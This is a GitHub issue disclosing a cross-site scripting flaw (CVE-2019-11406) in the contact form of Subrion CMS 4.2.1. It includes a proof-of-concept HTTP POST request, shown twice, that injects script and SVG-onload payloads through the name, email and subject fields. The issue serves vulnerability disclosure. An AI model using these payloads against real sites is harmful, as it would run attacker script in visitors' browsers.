Skip to content

demos.subrion.org allows _core/en/contacts/ XSS via the name, email, or phone parameter #821

Closed
@alorfm

Description

@alorfm

Title: [Subrion CMS- 4.2.1 XSS]

Date: [12-04-2019]

[Vulnerability Type]

Cross Site Scripting (XSS)

Version: [4.2.1]

Tested on:

[Windows,FireFox]

[Affected Product Code Base]

Subrion CMS - 4.2.1

[Affected Component]

parameter: name.
parameter: email.
parameter: phone.
In contact page

PoC:

POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Upgrade-Insecure-Requests: 1
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=



[Impact Code execution]
true


[Attack Vectors]
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2

__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=


Author: [Mohammed Alorf - twitter:@_oww]

CVE-2019-11406.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions